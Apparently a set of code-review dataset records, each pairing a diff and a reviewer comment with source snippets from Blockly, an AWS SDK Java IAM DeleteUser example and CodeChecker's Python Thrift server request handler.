* @private */ Blockly.Field.prototype.getClickTarget_ = function() { var nFields = 0; for (var i = 0, input; input = this.sourceBlock_.inputList[i]; i++) { nFields += input.fieldRow.length; } if (nFields <= 1 && this.sourceBlock_.outputConnection) { return this.sourceBlock_.getSvgRoot(); } else { return this.getSvgRoot(); } }; /** * Return the absolute coordinates of the top-left corner of this field. * The origin (0,0) is the top-left corner of the page body. * @return {!goog.math.Coordinate} Object with .x and .y properties. * @private */ Blockly.Field.prototype.getAbsoluteXY_ = function() { return goog.style.getPageOffset(this.getClickTarget_()); }; /** * Whether this field references any Blockly variables. If true it may need to * be handled differently during serialization and deserialization. Subclasses * may override this. * @return {boolean} True if this field has any variable references. * @package */ Blockly.Field.prototype.referencesVariables = function() { return false; };
1
9,743
Can have negative numbers with the '-' on the right (`10-`) by just using line 610.
LLK-scratch-blocks
js
@@ -1,4 +1,4 @@ -//snippet-sourcedescription:[DeleteUser.java demonstrates how to delete an AWS Identity and Access Management (IAM) user. This is only possible for users with no associated resources.] +//snippet-sourcedescription:[DeleteUser.java demonstrates how to delete an AWS Identity and Access Management (AWS IAM) user. This is only possible for users with no associated resources.] //snippet-keyword:[AWS SDK for Java v2] //snippet-keyword:[Code Sample] //snippet-service:[AWS IAM]
1
//snippet-sourcedescription:[DeleteUser.java demonstrates how to delete an AWS Identity and Access Management (IAM) user. This is only possible for users with no associated resources.] //snippet-keyword:[AWS SDK for Java v2] //snippet-keyword:[Code Sample] //snippet-service:[AWS IAM] //snippet-sourcetype:[full-example] //snippet-sourcedate:[11/02/2020] //snippet-sourceauthor:[scmacdon-aws] /* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 */ package com.example.iam; // snippet-start:[iam.java2.delete_user.import] import software.amazon.awssdk.regions.Region; import software.amazon.awssdk.services.iam.IamClient; import software.amazon.awssdk.services.iam.model.DeleteUserRequest; import software.amazon.awssdk.services.iam.model.IamException; // snippet-end:[iam.java2.delete_user.import] public class DeleteUser { public static void main(String[] args) { final String USAGE = "\n" + "Usage:\n" + " DeleteUser <userName> \n\n" + "Where:\n" + " userName - the name of the user to delete. \n\n" ; if (args.length != 1) { System.out.println(USAGE); System.exit(1); } // Read the command line argument String userName = args[0]; Region region = Region.AWS_GLOBAL; IamClient iam = IamClient.builder() .region(region) .build(); deleteIAMUser(iam, userName); System.out.println("Done"); iam.close(); } // snippet-start:[iam.java2.delete_user.main] public static void deleteIAMUser(IamClient iam, String userName) { try { DeleteUserRequest request = DeleteUserRequest.builder() .userName(userName) .build(); iam.deleteUser(request); System.out.println("Successfully deleted IAM user " + userName); } catch (IamException e) { System.err.println(e.awsErrorDetails().errorMessage()); System.exit(1); } } // snippet-end:[iam.java2.delete_user.main] }
1
18,239
AWS Identity and Access Management (IAM)
awsdocs-aws-doc-sdk-examples
rb
@@ -2381,11 +2381,10 @@ class ThriftRequestHandler(object): check_commands, check_durations, cc_version, statistics = \ store_handler.metadata_info(metadata_file) - if len(check_commands) == 0: - command = ' '.join(sys.argv) - elif len(check_commands) == 1: + command = '' + if len(check_commands) == 1: command = ' '.join(check_commands[0]) - else: + elif len(check_commands) > 1: command = "multiple analyze calls: " + \ '; '.join([' '.join(com) for com in check_commands])
1
# ------------------------------------------------------------------------- # The CodeChecker Infrastructure # This file is distributed under the University of Illinois Open Source # License. See LICENSE.TXT for details. # ------------------------------------------------------------------------- """ Handle Thrift requests. """ from __future__ import print_function from __future__ import division from __future__ import absolute_import import base64 import codecs from collections import defaultdict from datetime import datetime, timedelta import io import json import os import sys import tempfile import zipfile import zlib import sqlalchemy from sqlalchemy.sql.expression import or_, and_, not_, func, \ asc, desc, text, union_all, select, bindparam, literal_column import shared from codeCheckerDBAccess_v6 import constants, ttypes from codeCheckerDBAccess_v6.ttypes import * from libcodechecker import generic_package_context from libcodechecker.source_code_comment_handler import \ SourceCodeCommentHandler, SKIP_REVIEW_STATUSES from libcodechecker import util # TODO: Cross-subpackage import here. from libcodechecker.analyze import plist_parser from libcodechecker.analyze import skiplist_handler from libcodechecker.logger import get_logger from libcodechecker.profiler import timeit from libcodechecker.report import get_report_path_hash from libcodechecker.server import permissions from libcodechecker.server.database import db_cleanup from libcodechecker.server.database.config_db_model import Product from libcodechecker.server.database.database import conv from libcodechecker.server.database.run_db_model import \ AnalyzerStatistic, Report, ReviewStatus, File, Run, RunHistory, \ RunLock, Comment, BugPathEvent, BugReportPoint, \ FileContent, SourceComponent from libcodechecker.util import DBSession, slugify from . 
import store_handler LOG = get_logger('server') def exc_to_thrift_reqfail(func): """ Convert internal exceptions to RequestFailed exception which can be sent back on the thrift connections. """ func_name = func.__name__ def wrapper(*args, **kwargs): try: res = func(*args, **kwargs) return res except sqlalchemy.exc.SQLAlchemyError as alchemy_ex: # Convert SQLAlchemy exceptions. msg = str(alchemy_ex) LOG.warning("%s:\n%s", func_name, msg) raise shared.ttypes.RequestFailed(shared.ttypes.ErrorCode.DATABASE, msg) except shared.ttypes.RequestFailed as rf: LOG.warning(rf.message) raise except Exception as ex: LOG.warning(ex.message) raise shared.ttypes.RequestFailed(shared.ttypes.ErrorCode.GENERAL, ex.message) return wrapper def get_component_values(session, component_name): """ Get component values by component names and returns a tuple where the first item contains a list path which should be skipped and the second item contains a list of path which should be included. E.g.: +/a/b/x.cpp +/a/b/y.cpp -/a/b On the above component value this function will return the following: (['/a/b'], ['/a/b/x.cpp', '/a/b/y.cpp']) """ components = session.query(SourceComponent) \ .filter(SourceComponent.name.like(component_name)) \ .all() skip = [] include = [] for component in components: values = component.value.split('\n') for value in values: v = value[1:].strip() if value[0] == '+': include.append(v) elif value[0] == '-': skip.append(v) return skip, include def process_report_filter(session, report_filter): """ Process the new report filter. 
""" if report_filter is None: return text('') AND = [] if report_filter.filepath is not None: OR = [File.filepath.ilike(conv(fp)) for fp in report_filter.filepath] AND.append(or_(*OR)) if report_filter.checkerMsg is not None: OR = [Report.checker_message.ilike(conv(cm)) for cm in report_filter.checkerMsg] AND.append(or_(*OR)) if report_filter.checkerName is not None: OR = [Report.checker_id.ilike(conv(cn)) for cn in report_filter.checkerName] AND.append(or_(*OR)) if report_filter.runName is not None: OR = [Run.name.ilike(conv(rn)) for rn in report_filter.runName] AND.append(or_(*OR)) if report_filter.reportHash is not None: OR = [Report.bug_id.ilike(conv(rh)) for rh in report_filter.reportHash] AND.append(or_(*OR)) if report_filter.severity is not None: AND.append(Report.severity.in_(report_filter.severity)) if report_filter.detectionStatus is not None: dst = list(map(detection_status_str, report_filter.detectionStatus)) AND.append(Report.detection_status.in_(dst)) if report_filter.reviewStatus is not None: OR = [ReviewStatus.status.in_( list(map(review_status_str, report_filter.reviewStatus)))] # No database entry for unreviewed reports if (ttypes.ReviewStatus.UNREVIEWED in report_filter.reviewStatus): OR.append(ReviewStatus.status.is_(None)) AND.append(or_(*OR)) detection_status = report_filter.detectionStatus if report_filter.firstDetectionDate is not None: date = datetime.fromtimestamp(report_filter.firstDetectionDate) OR = [] if detection_status is not None and len(detection_status) == 1 and \ ttypes.DetectionStatus.RESOLVED in detection_status: OR.append(Report.fixed_at >= date) else: OR.append(Report.detected_at >= date) AND.append(or_(*OR)) if report_filter.fixDate is not None: date = datetime.fromtimestamp(report_filter.fixDate) OR = [] if detection_status is not None and len(detection_status) == 1 and \ ttypes.DetectionStatus.RESOLVED in detection_status: OR.append(Report.fixed_at < date) else: OR.append(Report.detected_at < date) AND.append(or_(*OR)) if 
report_filter.runHistoryTag is not None: OR = [] for history_date in report_filter.runHistoryTag: date = datetime.strptime(history_date, '%Y-%m-%d %H:%M:%S.%f') OR.append(and_(Report.detected_at <= date, or_( Report.fixed_at.is_(None), Report.fixed_at >= date))) AND.append(or_(*OR)) if report_filter.runTag is not None: OR = [] for tag_id in report_filter.runTag: history = session.query(RunHistory).get(tag_id) OR.append(and_(Report.run_id == history.run_id, and_(Report.detected_at <= history.time, or_(Report.fixed_at.is_(None), Report.fixed_at >= history.time)))) AND.append(or_(*OR)) if report_filter.componentNames is not None: OR = [] for component_name in report_filter.componentNames: skip, include = get_component_values(session, component_name) skip_q, include_q = None, None if include: and_q = [File.filepath.like(conv(fp)) for fp in include] include_q = select([File.id]).where(or_(*and_q)) if skip: and_q = [(File.filepath.like(conv(fp))) for fp in skip] skip_q = select([File.id]).where(or_(*and_q)) file_ids = [] if skip and include: skip_q = include_q.except_(skip_q).alias('component') file_ids = session.query(skip_q) \ .distinct() \ .all() elif include: file_ids = session.query(include_q.alias('include')).all() elif skip: and_q = [not_(File.filepath.like(conv(fp))) for fp in skip] skip_q = select([File.id]).where(and_(*and_q)) file_ids = session.query(skip_q.alias('skip')).all() OR.append(or_(File.id.in_([f_id[0] for f_id in file_ids]))) AND.append(or_(*OR)) filter_expr = and_(*AND) return filter_expr def get_diff_hashes_for_query(base_run_ids, base_line_hashes, new_run_ids, new_check_hashes, diff_type): """ Get the report hash list for the result comparison. Returns the list of hashes (NEW, RESOLVED, UNRESOLVED) and the run ids which should be queried for the reports. 
""" if diff_type == DiffType.NEW: df = [] + list(new_check_hashes.difference(base_line_hashes)) return df, new_run_ids elif diff_type == DiffType.RESOLVED: df = [] + list(base_line_hashes.difference(new_check_hashes)) return df, base_run_ids elif diff_type == DiffType.UNRESOLVED: df = [] + list(base_line_hashes.intersection(new_check_hashes)) return df, new_run_ids else: msg = 'Unsupported diff type: ' + str(diff_type) LOG.error(msg) raise shared.ttypes.RequestFailed(shared.ttypes.ErrorCode.DATABASE, msg) def bugpathevent_db_to_api(bpe): return ttypes.BugPathEvent( startLine=bpe.line_begin, startCol=bpe.col_begin, endLine=bpe.line_end, endCol=bpe.col_end, msg=bpe.msg, fileId=bpe.file_id) def bugreportpoint_db_to_api(brp): return BugPathPos( startLine=brp.line_begin, startCol=brp.col_begin, endLine=brp.line_end, endCol=brp.col_end, fileId=brp.file_id) def detection_status_enum(status): if status == 'new': return DetectionStatus.NEW elif status == 'resolved': return DetectionStatus.RESOLVED elif status == 'unresolved': return DetectionStatus.UNRESOLVED elif status == 'reopened': return DetectionStatus.REOPENED def detection_status_str(status): if status == DetectionStatus.NEW: return 'new' elif status == DetectionStatus.RESOLVED: return 'resolved' elif status == DetectionStatus.UNRESOLVED: return 'unresolved' elif status == DetectionStatus.REOPENED: return 'reopened' def review_status_str(status): if status == ttypes.ReviewStatus.UNREVIEWED: return 'unreviewed' elif status == ttypes.ReviewStatus.CONFIRMED: return 'confirmed' elif status == ttypes.ReviewStatus.FALSE_POSITIVE: return 'false_positive' elif status == ttypes.ReviewStatus.INTENTIONAL: return 'intentional' def review_status_enum(status): if status == 'unreviewed': return ttypes.ReviewStatus.UNREVIEWED elif status == 'confirmed': return ttypes.ReviewStatus.CONFIRMED elif status == 'false_positive': return ttypes.ReviewStatus.FALSE_POSITIVE elif status == 'intentional': return ttypes.ReviewStatus.INTENTIONAL 
def unzip(b64zip, output_dir):
    """
    This function unzips the base64 encoded zip file. This zip is extracted
    to a temporary directory and the ZIP is then deleted.
    The function returns the name of the extracted directory.
    """
    # NOTE(review): the docstring above claims a return value, but no value
    # is actually returned below — verify against callers.
    with tempfile.NamedTemporaryFile(suffix='.zip') as zip_file:
        LOG.debug("Unzipping mass storage ZIP '{0}' to '{1}'..."
                  .format(zip_file.name, output_dir))

        # The payload arrives base64-encoded and zlib-compressed on top of
        # the ZIP container itself.
        zip_file.write(zlib.decompress(base64.b64decode(b64zip)))
        with zipfile.ZipFile(zip_file, 'r', allowZip64=True) as zipf:
            try:
                zipf.extractall(output_dir)
            except Exception:
                LOG.error("Failed to extract received ZIP.")
                import traceback
                traceback.print_exc()
                raise


def create_review_data(review_status):
    """Build a Thrift ReviewData from a ReviewStatus DB row.

    A missing row (None/falsy) means the report is unreviewed.
    """
    if review_status:
        return ReviewData(status=review_status_enum(review_status.status),
                          comment=review_status.message,
                          author=review_status.author,
                          date=str(review_status.date))
    else:
        return ReviewData(status=ttypes.ReviewStatus.UNREVIEWED)


def create_count_expression(report_filter):
    """Return the COUNT expression to use: distinct bug hashes when the
    filter requests unique results, plain row count otherwise."""
    if report_filter is not None and report_filter.isUnique:
        return func.count(Report.bug_id.distinct())
    else:
        return func.count(literal_column('*'))


def filter_report_filter(q, filter_expression, run_ids=None, cmp_data=None,
                         diff_hashes=None):
    """Apply the common report filtering (run ids, file/review-status joins,
    the processed filter expression and — in compare mode — the diff hash
    set) to an existing query and return it."""
    if run_ids:
        q = q.filter(Report.run_id.in_(run_ids))

    q = q.outerjoin(File,
                    Report.file_id == File.id) \
        .outerjoin(ReviewStatus,
                   ReviewStatus.bug_hash == Report.bug_id) \
        .filter(filter_expression)

    if cmp_data:
        q = q.filter(Report.bug_id.in_(diff_hashes))

    return q


def get_sort_map(sort_types, is_unique=False):
    # Get a list of sort_types which will be a nested ORDER BY.
    # Each SortType maps to a list of (column, label) pairs; the label is
    # used when ordering a labelled subquery instead of the raw column.
    sort_type_map = {
        SortType.FILENAME: [(File.filepath, 'filepath'),
                            (Report.line, 'line')],
        SortType.BUG_PATH_LENGTH: [(Report.path_length, 'bug_path_length')],
        SortType.CHECKER_NAME: [(Report.checker_id, 'checker_id')],
        SortType.SEVERITY: [(Report.severity, 'severity')],
        SortType.REVIEW_STATUS: [(ReviewStatus.status, 'rw_status')],
        SortType.DETECTION_STATUS: [(Report.detection_status, 'dt_status')]}

    if is_unique:
        # Unique (per-hash) results have no meaningful detection status and
        # are sorted by file name instead of full path + line.
        sort_type_map[SortType.FILENAME] = [(File.filename, 'filename')]
        sort_type_map[SortType.DETECTION_STATUS] = []

    # Mapping the SQLAlchemy functions.
    order_type_map = {Order.ASC: asc, Order.DESC: desc}

    if sort_types is None:
        # Default ordering: most severe reports first.
        sort_types = [SortMode(SortType.SEVERITY, Order.DESC)]

    return sort_types, sort_type_map, order_type_map


def sort_results_query(query, sort_types, sort_type_map, order_type_map,
                       order_by_label=False):
    """
    Helper method for __queryDiffResults and queryResults to apply sorting.
    """
    for sort in sort_types:
        sorttypes = sort_type_map.get(sort.type)
        for sorttype in sorttypes:
            order_type = order_type_map.get(sort.ord)
            # Labels are needed when sorting a labelled subquery.
            sort_col = sorttype[1] if order_by_label else sorttype[0]
            query = query.order_by(order_type(sort_col))

    return query


def filter_unresolved_reports(q):
    """
    Filter reports which are unresolved.

    Note: review status of these reports are not in the SKIP_REVIEW_STATUSES
    list.
    """
    skip_review_status = SKIP_REVIEW_STATUSES
    return q.filter(Report.fixed_at.is_(None)) \
            .filter(or_(ReviewStatus.status.is_(None),
                        ReviewStatus.status.notin_(skip_review_status))) \
            .outerjoin(ReviewStatus,
                       ReviewStatus.bug_hash == Report.bug_id)


def get_report_hashes(session, run_ids, tag_ids):
    """
    Get report hash list for the reports which can be found in the given runs
    and the given tags.
    """
    q = session.query(Report.bug_id)

    if run_ids:
        q = q.filter(Report.run_id.in_(run_ids))

    if tag_ids:
        # A report belongs to a tag if it was detected at/before the tag's
        # timestamp and not yet fixed at that timestamp.
        q = q.outerjoin(RunHistory,
                        RunHistory.run_id == Report.run_id) \
            .filter(RunHistory.id.in_(tag_ids)) \
            .filter(Report.detected_at <= RunHistory.time) \
            .filter(or_(Report.fixed_at.is_(None),
                        Report.fixed_at > RunHistory.time))

    return set([t[0] for t in q])


def check_remove_runs_lock(session, run_ids):
    """
    Check if there is an existing lock on the given runs, which has not
    expired yet. If so, the run cannot be deleted, as someone is assumed to
    be storing into it.
    """
    locks_expired_at = datetime.now() - timedelta(
        seconds=db_cleanup.RUN_LOCK_TIMEOUT_IN_DATABASE)

    run_locks = session.query(RunLock.name) \
        .filter(RunLock.locked_at >= locks_expired_at)

    if run_ids:
        run_locks = run_locks.filter(Run.id.in_(run_ids))

    run_locks = run_locks \
        .outerjoin(Run,
                   Run.name == RunLock.name) \
        .all()

    if run_locks:
        raise shared.ttypes.RequestFailed(
            shared.ttypes.ErrorCode.DATABASE,
            "Can not remove results because the following runs "
            "are locked: {0}".format(
                ', '.join([r[0] for r in run_locks])))


class ThriftRequestHandler(object):
    """
    Connect to database and handle thrift client requests.
    """

    def __init__(self,
                 manager,
                 Session,
                 product,
                 auth_session,
                 config_database,
                 checker_md_docs,
                 checker_md_docs_map,
                 src_comment_handler,
                 package_version):

        if not product:
            raise ValueError("Cannot initialize request handler without "
                             "a product to serve.")

        self.__manager = manager
        self.__product = product
        self.__auth_session = auth_session
        self.__config_database = config_database
        self.__checker_md_docs = checker_md_docs
        self.__checker_doc_map = checker_md_docs_map
        self.__src_comment_handler = src_comment_handler
        self.__package_version = package_version
        self.__Session = Session
        # Base arguments forwarded to every permission check.
        self.__permission_args = {
            'productID': product.id
        }

    def __require_permission(self, required):
        """
        Helper method to raise an UNAUTHORIZED exception if the user does not
        have any of the given permissions.
        """
        with DBSession(self.__config_database) as session:
            args = dict(self.__permission_args)
            args['config_db_session'] = session

            # Any single matching permission is sufficient.
            if not any([permissions.require_permission(
                            perm, args, self.__auth_session)
                        for perm in required]):
                raise shared.ttypes.RequestFailed(
                    shared.ttypes.ErrorCode.UNAUTHORIZED,
                    "You are not authorized to execute this action.")

            return True

    def __require_admin(self):
        # Caller must hold product-admin rights.
        self.__require_permission([permissions.PRODUCT_ADMIN])

    def __require_access(self):
        # Caller must be able to read the product.
        self.__require_permission([permissions.PRODUCT_ACCESS])

    def __require_store(self):
        # Caller must be able to store results into the product.
        self.__require_permission([permissions.PRODUCT_STORE])

    @staticmethod
    def __get_run_ids_to_query(session, cmp_data=None):
        """
        Return run id list for the queries.
        If compare data is set remove those run ids from the returned list.
        The returned run id list can be used as a baseline for comparisons.
        """
        res = session.query(Run.id).all()
        run_ids = [r[0] for r in res]
        if cmp_data:
            all_rids = set(run_ids)
            cmp_rids = set(cmp_data.runIds) if cmp_data.runIds else set()
            run_ids = list(all_rids.difference(cmp_rids))

        return run_ids

    @exc_to_thrift_reqfail
    @timeit
    def getRunData(self, run_filter):
        """Return RunData for every run matching the optional run_filter,
        including unresolved report counts, latest tag, detection-status
        breakdown and per-analyzer statistics."""
        self.__require_access()
        with DBSession(self.__Session) as session:

            # Count the reports subquery.
            stmt = session.query(Report.run_id,
                                 func.count(Report.bug_id)
                                 .label('report_count'))

            stmt = filter_unresolved_reports(stmt) \
                .group_by(Report.run_id).subquery()

            # Latest run-history entry (tag) per run.
            tag_q = session.query(RunHistory.run_id,
                                  func.max(RunHistory.id).label(
                                      'run_history_id'),
                                  func.max(RunHistory.time).label(
                                      'run_history_time')) \
                .group_by(RunHistory.run_id) \
                .subquery()

            q = session.query(Run,
                              RunHistory.version_tag,
                              RunHistory.cc_version,
                              stmt.c.report_count)

            if run_filter is not None:
                if run_filter.ids is not None:
                    q = q.filter(Run.id.in_(run_filter.ids))
                if run_filter.names is not None:
                    if run_filter.exactMatch:
                        q = q.filter(Run.name.in_(run_filter.names))
                    else:
                        # Case-insensitive substring match; user input is
                        # escaped for LIKE wildcards with '\'.
                        OR = [Run.name.ilike('{0}'.format(conv(
                            util.escape_like(name, '\\'))), escape='\\') for
                            name in run_filter.names]
                        q = q.filter(or_(*OR))

            q = q.outerjoin(stmt, Run.id == stmt.c.run_id) \
                .outerjoin(tag_q, Run.id == tag_q.c.run_id) \
                .outerjoin(RunHistory,
                           RunHistory.id == tag_q.c.run_history_id) \
                .group_by(Run.id,
                          RunHistory.version_tag,
                          RunHistory.cc_version,
                          stmt.c.report_count) \
                .order_by(Run.date)

            # Get report count for each detection statuses.
            status_q = session.query(Report.run_id,
                                     Report.detection_status,
                                     func.count(Report.bug_id))

            if run_filter and run_filter.ids is not None:
                status_q = status_q.filter(Report.run_id.in_(run_filter.ids))

            status_q = status_q.group_by(Report.run_id,
                                         Report.detection_status)

            status_sum = defaultdict(defaultdict)
            for run_id, status, count in status_q:
                status_sum[run_id][detection_status_enum(status)] = count

            # Get analyzer statistics.
            analyzer_statistics = defaultdict(lambda: defaultdict())
            stat_q = session.query(AnalyzerStatistic,
                                   Run.id)

            if run_filter and run_filter.ids is not None:
                stat_q = stat_q.filter(Run.id.in_(run_filter.ids))

            stat_q = stat_q \
                .outerjoin(RunHistory,
                           RunHistory.id == AnalyzerStatistic.run_history_id) \
                .outerjoin(Run,
                           Run.id == RunHistory.run_id)

            for stat, run_id in stat_q:
                # Failed-file list and analyzer version are stored
                # zlib-compressed in the database.
                failed_files = zlib.decompress(stat.failed_files).split('\n') \
                    if stat.failed_files else None
                analyzer_version = zlib.decompress(stat.version) \
                    if stat.version else None

                analyzer_statistics[run_id][stat.analyzer_type] = \
                    ttypes.AnalyzerStatistics(version=analyzer_version,
                                              failed=stat.failed,
                                              failedFilePaths=failed_files,
                                              successful=stat.successful)

            results = []

            for instance, tag, cc_version, report_count in q:
                if report_count is None:
                    report_count = 0

                results.append(RunData(instance.id,
                                       str(instance.date),
                                       instance.name,
                                       instance.duration,
                                       report_count,
                                       instance.command,
                                       status_sum[instance.id],
                                       tag,
                                       cc_version,
                                       analyzer_statistics[instance.id]))
            return results

    @exc_to_thrift_reqfail
    @timeit
    def getRunHistory(self, run_ids, limit, offset, run_history_filter):
        """Return RunHistoryData entries (newest first) for the given runs,
        optionally filtered by tag names and paginated."""
        self.__require_access()

        with DBSession(self.__Session) as session:

            res = session.query(RunHistory)

            if run_ids:
                res = res.filter(RunHistory.run_id.in_(run_ids))

            if run_history_filter:
                res = res.filter(RunHistory.version_tag.in_(
                    run_history_filter.tagNames))

            res = res.order_by(RunHistory.time.desc())

            if limit:
                res = res.limit(limit).offset(offset)

            results = []
            for history in res:
                # Stored zlib-compressed; may be absent.
                check_command = zlib.decompress(history.check_command) \
                    if history.check_command else None

                analyzer_statistics = {}
                for stat in history.analyzer_statistics:
                    failed_files = zlib.decompress(stat.failed_files) \
                        .split('\n') if stat.failed_files else None
                    analyzer_version = zlib.decompress(stat.version) \
                        if stat.version else None

                    analyzer_statistics[stat.analyzer_type] = \
                        ttypes.AnalyzerStatistics(
                            version=analyzer_version,
                            failed=stat.failed,
                            failedFilePaths=failed_files,
                            successful=stat.successful)

                results.append(RunHistoryData(
                    id=history.id,
                    runId=history.run.id,
                    runName=history.run.name,
                    versionTag=history.version_tag,
                    user=history.user,
                    time=str(history.time),
                    checkCommand=check_command,
                    codeCheckerVersion=history.cc_version,
                    analyzerStatistics=analyzer_statistics))

            return results

    @exc_to_thrift_reqfail
    @timeit
    def getReport(self, reportId):
        """Return a single ReportData by database id; raises DATABASE
        RequestFailed when the id does not exist."""
        self.__require_access()

        with DBSession(self.__Session) as session:

            result = session.query(Report,
                                   File,
                                   ReviewStatus) \
                .filter(Report.id == reportId) \
                .outerjoin(File, Report.file_id == File.id) \
                .outerjoin(ReviewStatus,
                           ReviewStatus.bug_hash == Report.bug_id) \
                .limit(1).one_or_none()

            if not result:
                raise shared.ttypes.RequestFailed(
                    shared.ttypes.ErrorCode.DATABASE,
                    "Report " + str(reportId) + " not found!")

            report, source_file, review_status = result
            return ReportData(
                runId=report.run_id,
                bugHash=report.bug_id,
                checkedFile=source_file.filepath,
                checkerMsg=report.checker_message,
                reportId=report.id,
                fileId=source_file.id,
                line=report.line,
                column=report.column,
                checkerId=report.checker_id,
                severity=report.severity,
                reviewData=create_review_data(review_status),
                detectionStatus=detection_status_enum(report.detection_status),
                detectedAt=str(report.detected_at),
                fixedAt=str(report.fixed_at) if report.fixed_at else None)

    @exc_to_thrift_reqfail
    @timeit
    def getDiffResultsHash(self, run_ids, report_hashes, diff_type):
        """Return the subset of report_hashes that are NEW / RESOLVED /
        UNRESOLVED relative to the reports stored in the given runs."""
        self.__require_access()

        with DBSession(self.__Session) as session:
            if diff_type == DiffType.NEW:
                # In postgresql we can select multiple rows filled with
                # constants by using `unnest` function. In sqlite we have to
                # use multiple UNION ALL.
                if not report_hashes:
                    return []

                base_hashes = session.query(Report.bug_id.label('bug_id')) \
                    .outerjoin(File, Report.file_id == File.id) \
                    .filter(Report.run_id.in_(run_ids))

                if self.__product.driver_name == 'postgresql':
                    # unnest() turns the hash list into rows server-side.
                    new_hashes = select([func.unnest(report_hashes)
                                         .label('bug_id')]) \
                        .except_(base_hashes).alias('new_bugs')
                    return [res[0] for res in session.query(new_hashes)]
                else:
                    # The maximum number of compound select in sqlite is 500
                    # by default. We increased SQLITE_MAX_COMPOUND_SELECT
                    # limit but when the number of compound select was larger
                    # than 8435 sqlite threw a `Segmentation fault` error.
                    # For this reason we create queries with chunks.
                    new_hashes = []
                    chunk_size = 500
                    for chunk in [report_hashes[i:i + chunk_size] for
                                  i in range(0, len(report_hashes),
                                             chunk_size)]:
                        # One SELECT-constant per hash, glued with UNION ALL.
                        new_hashes_query = union_all(*[
                            select([bindparam('bug_id' + str(i), h)
                                   .label('bug_id')])
                            for i, h in enumerate(chunk)])

                        q = select([new_hashes_query]).except_(base_hashes)
                        new_hashes.extend([res[0] for res in session.query(q)])

                    return new_hashes
            elif diff_type == DiffType.RESOLVED:
                results = session.query(Report.bug_id) \
                    .filter(Report.run_id.in_(run_ids)) \
                    .filter(Report.bug_id.notin_(report_hashes)) \
                    .all()

                return [res[0] for res in results]
            elif diff_type == DiffType.UNRESOLVED:
                results = session.query(Report.bug_id) \
                    .filter(Report.run_id.in_(run_ids)) \
                    .filter(Report.bug_id.in_(report_hashes)) \
                    .all()

                return [res[0] for res in results]
            else:
                return []

    @exc_to_thrift_reqfail
    @timeit
    def getRunResults(self, run_ids, limit, offset, sort_types,
                      report_filter, cmp_data):
        """Return a paginated, sorted list of ReportData for the given runs,
        optionally restricted by report_filter and compare (diff) data."""
        self.__require_access()
        max_query_limit = constants.MAX_QUERY_SIZE
        if limit > max_query_limit:
            # Clamp client-requested page size to the server-side maximum.
            LOG.debug('Query limit ' + str(limit) +
                      ' was larger than max query limit ' +
                      str(max_query_limit) + ', setting limit to ' +
                      str(max_query_limit))
            limit = max_query_limit

        with DBSession(self.__Session) as session:
            results = []

            diff_hashes = None
            if cmp_data:
                diff_hashes, run_ids = self._cmp_helper(session,
                                                        run_ids,
                                                        report_filter,
                                                        cmp_data)
                if not diff_hashes:
                    # There is no difference.
                    return results

            filter_expression = process_report_filter(session, report_filter)

            is_unique = report_filter is not None and report_filter.isUnique
            if is_unique:
                sort_types, sort_type_map, order_type_map = \
                    get_sort_map(sort_types, True)

                # One representative report id per bug hash, plus the max of
                # every column we may need to sort by.
                selects = [func.max(Report.id).label('id')]
                for sort in sort_types:
                    sorttypes = sort_type_map.get(sort.type)
                    for sorttype in sorttypes:
                        if sorttype[0] != 'bug_path_length':
                            selects.append(func.max(sorttype[0])
                                           .label(sorttype[1]))

                unique_reports = session.query(*selects)
                unique_reports = filter_report_filter(unique_reports,
                                                      filter_expression,
                                                      run_ids,
                                                      cmp_data,
                                                      diff_hashes)
                unique_reports = unique_reports \
                    .group_by(Report.bug_id) \
                    .subquery()

                # Sort the results
                sorted_reports = \
                    session.query(unique_reports.c.id)

                sorted_reports = sort_results_query(sorted_reports,
                                                    sort_types,
                                                    sort_type_map,
                                                    order_type_map,
                                                    True)

                sorted_reports = sorted_reports \
                    .limit(limit).offset(offset).subquery()

                q = session.query(Report.id, Report.bug_id,
                                  Report.checker_message, Report.checker_id,
                                  Report.severity, Report.detected_at,
                                  Report.fixed_at, ReviewStatus,
                                  File.filename, File.filepath,
                                  Report.path_length) \
                    .outerjoin(File, Report.file_id == File.id) \
                    .outerjoin(ReviewStatus,
                               ReviewStatus.bug_hash == Report.bug_id) \
                    .outerjoin(sorted_reports,
                               sorted_reports.c.id == Report.id) \
                    .filter(sorted_reports.c.id.isnot(None))

                # We have to sort the results again because an ORDER BY in a
                # subtable is broken by the JOIN.
                q = sort_results_query(q,
                                       sort_types,
                                       sort_type_map,
                                       order_type_map)

                for report_id, bug_id, checker_msg, checker, severity, \
                    detected_at, fixed_at, status, filename, path, \
                        bug_path_len in q:
                    review_data = create_review_data(status)

                    results.append(
                        ReportData(bugHash=bug_id,
                                   checkedFile=filename,
                                   checkerMsg=checker_msg,
                                   checkerId=checker,
                                   severity=severity,
                                   reviewData=review_data,
                                   detectedAt=str(detected_at),
                                   fixedAt=str(fixed_at),
                                   bugPathLength=bug_path_len))
            else:
                # Non-unique mode: one result row per stored report.
                q = session.query(Report.run_id, Report.id, Report.file_id,
                                  Report.line, Report.column,
                                  Report.detection_status, Report.bug_id,
                                  Report.checker_message, Report.checker_id,
                                  Report.severity, Report.detected_at,
                                  Report.fixed_at, ReviewStatus,
                                  File.filepath,
                                  Report.path_length) \
                    .outerjoin(File, Report.file_id == File.id) \
                    .outerjoin(ReviewStatus,
                               ReviewStatus.bug_hash == Report.bug_id) \
                    .filter(filter_expression)

                if run_ids:
                    q = q.filter(Report.run_id.in_(run_ids))

                if cmp_data:
                    q = q.filter(Report.bug_id.in_(diff_hashes))

                sort_types, sort_type_map, order_type_map = \
                    get_sort_map(sort_types)

                q = sort_results_query(q, sort_types, sort_type_map,
                                       order_type_map)

                q = q.limit(limit).offset(offset)

                for run_id, report_id, file_id, line, column, d_status, \
                    bug_id, checker_msg, checker, severity, detected_at,\
                    fixed_at, r_status, path, bug_path_len \
                        in q:

                    review_data = create_review_data(r_status)
                    results.append(
                        ReportData(runId=run_id,
                                   bugHash=bug_id,
                                   checkedFile=path,
                                   checkerMsg=checker_msg,
                                   reportId=report_id,
                                   fileId=file_id,
                                   line=line,
                                   column=column,
                                   checkerId=checker,
                                   severity=severity,
                                   reviewData=review_data,
                                   detectionStatus=detection_status_enum(
                                       d_status),
                                   detectedAt=str(detected_at),
                                   fixedAt=str(fixed_at)
                                   if fixed_at else None,
                                   bugPathLength=bug_path_len))

            return results

    @timeit
    def getRunReportCounts(self, run_ids, report_filter,
                           limit, offset):
        """
          Count the results separately for multiple runs.
          If an empty run id list is provided the report
